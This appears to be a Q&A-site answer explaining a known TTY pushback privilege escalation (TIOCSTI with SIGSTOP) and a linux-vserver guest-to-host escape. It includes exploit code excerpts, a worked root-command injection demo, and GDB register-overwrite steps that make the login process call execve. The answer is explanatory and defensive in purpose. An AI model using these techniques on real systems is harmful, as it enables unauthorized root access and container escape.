OK, this is not a complete answer, so I preferred to wait for the bounty to expire so as not to seem opportunistic. I cannot replicate the linux-vserver part of the vulnerability (mostly because it probably needs a 2.6 kernel, and the assembly above requires both the host and the guest machines to run in 32-bit mode). I can only replicate the basic vulnerability and explain how the rest works. Here goes:
The pushback
The TIOCSTI ioctl is an esoteric I/O control that allows faking input. From man 4 tty_ioctl:
Faking input
TIOCSTI const char *argp
Insert the given byte in the input queue.
Therefore you can place bytes into the input queue of a TTY (or more likely on modern systems PTY, i.e. pseudo terminal) programmatically.
Now, if a TTY is shared by a process that has limited privileges and a process that has elevated privileges (e.g. a root shell), you may be able to feed bytes from the limited shell into the input queue that the elevated shell reads. This is what the example code from halfdog does, but there is one extra thing we need to know about: how shells deal with the SIGSTOP signal. So we will make a detour there.
SIGSTOP, SIGTSTP and shells
SIGSTOP stops a process in the same way as SIGTSTP, except that it cannot be caught or ignored (see the SO question), and SIGTSTP is what pretty much all terminals send on Ctrl+Z. A trivial example would be:
]$ less /etc/group # And hit Ctrl+Z
[1]+ Stopped(SIGTSTP) less /etc/group
]$ fg # fg sends SIGCONT, and we are back inside less
Yet, shells ignore SIGTSTP, for example:
]# su - grochmal
]$ # Ctrl+Z does not do anything in here
]$ exit
logout
]# # back into a root shell
Shells cannot ignore SIGSTOP, but a shell that receives SIGSTOP first relays it to all its children and only then stops. This is also the reason you need the nohup command when you want a process to survive a shell stop (or shell termination). Hmm... but if nohup can make a process survive a shell stop, so can one of our processes that implements similar signal handlers.
Moreover, if we can leave our process running after the shell stops and then inject bytes into the TTY input, the process that receives those bytes is the root shell!
The code
The example code does exactly that. First it prepares the signal handlers:
sigAction.sa_sigaction=handleSignal;
sigfillset(&sigAction.sa_mask);
sigAction.sa_flags=SA_SIGINFO;
sigAction.sa_restorer=NULL;
sigaction(SIGSTOP, &sigAction, NULL);
And sends SIGSTOP to its parent (the unprivileged shell):
if (sendSignalFlag) kill(getppid(), SIGSTOP);
It then pushes every byte from the argument after -- into the TTY input:
pushbackLength=strlen(pushbackString)+1;
for(pushbackPos=0; pushbackPos<pushbackLength; pushbackPos++) {
  result=ioctl(0, TIOCSTI,
      pushbackPos+1!=pushbackLength?pushbackString+pushbackPos:"\n");
  if(result) {
    fprintf(stderr, "Pushback failed, result %d, error %d (%s)\n",
        result, errno, strerror(errno));
    return(1);
  }
}
And that's all. The only extra trick is the $'' syntax, which I'll talk about in the next example:
Example of trivial usage
Let's start from a root shell, perform a su - and make a trivial pushback.
]# ls /
bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var
]# su - grochmal
]$ wget http://www.halfdog.net/Security/2012/TtyPushbackPrivilegeEscalation/TtyPushbackSignaling.c
]$ gcc -o ttyp TtyPushbackSignaling.c
TtyPushbackSignaling.c: In function ‘main’:
TtyPushbackSignaling.c:83:28: warning: implicit declaration of function ‘getppid’ [-Wimplicit-function-declaration]
if (sendSignalFlag) kill(getppid(), SIGSTOP);
That's fine, they just forgot to add #include <unistd.h>. And now the pushback:
]$ echo yay >/yay
-bash: /yay: Permission denied
]$ ./ttyp -- $'echo yay >/yay\necho nay >/nay\n'
echo yay >/yay
echo nay >/nay
[1]+ Stopped su - grochmal
]# echo yay >/yay
]# echo nay >/nay
]# # here I regain control of the shell
]# jobs
[1]+ Stopped su - grochmal
]# ls /
bin boot dev etc home lib lib64 lost+found media mnt nay opt proc root run sbin srv sys tmp usr var yay
As the user grochmal I can't write to /yay, but if I push the echo into the input queue and force the root shell to execute it, it runs with root privileges. The ./ttyp call uses the $'' shell syntax, which allows me to embed \n characters as newlines (0x0a), not as the two characters \ and n.
]$ echo 'yay\nyay'
yay\nyay
]$ echo $'yay\nyay'
yay
yay
Inside the virtual container
(Can't replicate this, can only argue about how it should work)
Now comes the tricky bit of your question, namely this:
cat <<EOF > /x
#!/bin/bash
exec /TtyPushbackSignalin --NoSignal -- \$'\ntouch /xxx-outside\nstty sane'
EOF
chmod 0755 /x
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x7880cd
(gdb) set *0x8051004=0x8051002
(gdb) set *0x8051008=0
(gdb) set $eax=0x0b
(gdb) set $ebx=0x8051002
(gdb) set $ecx=0x8051004
(gdb) set $edx=0x8051008
(gdb) set $eip=0x8051000
(gdb) quit
This expects a virtualisation engine (in this case linux-vserver) to share a TTY between the host and the guest machines. In other words, we are not escalating privileges from a normal user to root but from root on a virtual machine to root on the host machine.
The first part is not that different from the trivial example above. We create a script named /x and call the pushback code from inside it. The only differences are:
- We will call this upon logout (see more below), so we do not need to send SIGSTOP ourselves. We use --NoSignal for that (it controls that flag in the code).
- We need to escape the $ (\$) since it needs to be passed to exec
So yeah, we have a script (/x) that is executable (chmod 755). If we can force that script to be called upon logoff (and the TTY is shared) we win. We know that logoff is performed by waking up the login process, which then returns the TTY.
Note: most of today's Linux systems will be using systemd-login, not plain login.
The assembly part
The login process is waiting for SIGCONT (just like any stopped process) and its memory is owned by root of the virtual machine. Since we own that memory, we can make the process execute whatever we want by corrupting it. That is what GDB is doing there. Based on the register names in that excerpt, we can see that it is running on an i386 Intel CPU, which is little-endian and has a word size of 32 bits (4 bytes). We can rewrite that GDB part into an equivalent that uses full words (GDB would use full words anyway; the following is just more explicit):
gdb --pid [pid of login process]
(gdb) set *0x8051000=0x007880cd
(gdb) set *0x8051004=0x08051002
(gdb) set *0x8051008=0x00000000
(gdb) set $eax=0x0000000b
(gdb) set $ebx=0x08051002
(gdb) set $ecx=0x08051004
(gdb) set $edx=0x08051008
(gdb) set $eip=0x08051000
(gdb) quit
We are overwriting EIP, the instruction pointer, to point to a place in memory which we overwrite with 0x007880cd. cd is an opcode which takes one byte as an argument, therefore we can read it as the bytes cd 80, or simply int 0x80 in Intel assembly (remember that this is little-endian, so the lowest byte, cd, comes first in memory).
int 0x80 happens to be the interrupt that performs a syscall on x86 (i386) Intel. The syscall number is taken from the EAX register, which we have overwritten with 0x0b. We can check for that syscall number in the Linux kernel headers, i.e. in x86/include/generated/asm/syscalls_32.h. It happens to be:
#ifdef CONFIG_X86_32
__SYSCALL_I386(11, sys_execve, )
#else
__SYSCALL_I386(11, compat_sys_execve, )
#endif
So yeah, once it wakes up, the login process will perform the sys_execve system call. But, wait, according to man 2 execve, that system call has arguments:
int execve(const char *filename, char *const argv[], char *const envp[]);
With int 0x80 the first three syscall arguments are taken from the EBX, ECX and EDX registers, which we also conveniently overwrite:
- EBX contains 0x08051002, which is 2 bytes after 0x08051000, which we have set to 0x007880cd. If we remember that this is a little-endian machine, we can see that the two bytes starting at 0x08051002 are 0x78 and 0x00. This is interpreted as a const char *, therefore it is the character x (0x78) followed by the string terminator \0 (0x00).
- ECX should be a const char **, a pointer to pointers (null terminated for syscall purposes). On x86 Intel a pointer is 4 bytes long. We set ECX to 0x08051004, and the 4 bytes there contain 0x08051002, which is a pointer to the string "x" (remember? that is the content of EBX). The next 4 bytes (at 0x08051008) contain only zeros, terminating the array of pointers.
- EDX contains 0x08051008, which (as a const char **) points to 4 bytes of zeros, meaning an empty environment.
Therefore, in plain C, our call could be written as:
char *x = "x";
char *ar[] = { x, 0 };
execve(x, ar, &ar[1]);
This technique of reusing memory locations for several arguments in a syscall is very common in shellcode because it reduces its size.
Extra notes
The guys at halfdog also mention NX and ASLR but I have no clue why. NX and ASLR protect from buffer overflows when the attacker either can only overwrite the stack or cannot analyze the specific instance of a process ('cause the stack start is randomized).
NX prevents execution of code from the stack. But we do not care about the stack; we can pretty much corrupt the memory next to the current EIP, which would be in a part of memory that is allowed to contain executable instructions.
ASLR randomises the start of the stack location in memory. This prevents a buffer overflow from knowing where it is. There was a vulnerability that allowed overcoming it by bouncing off lib-exec (mentioned by halfdog), but it has long been fixed pretty much everywhere.
You can defeat both by simply using GDB and /proc/<PID>/stat to find the current EIP (see the relevant SO question) and corrupting memory close to it instead of 0x8051000.
Conclusion
The vulnerability performed an execve call from the corrupted login process. This execve started the script that pushed bytes into the TTY input queue, which was then read by the host machine shell.
I could not replicate this on anything I had. I admit that I did not use an environment similar to what halfdog did (kernel 2.6, x86 Intel, linux-vserver; instead I tried x86_64, kernels 3.16 and 4.7, and Xen). One thing that bugs me is how the execve call finds the script (that's my major issue with replication); I believe that linux-vserver leaves the host shell in the / filesystem of the guest machine (see man 7 path_resolution). Nevertheless, I hope that this more or less clarifies how this should work.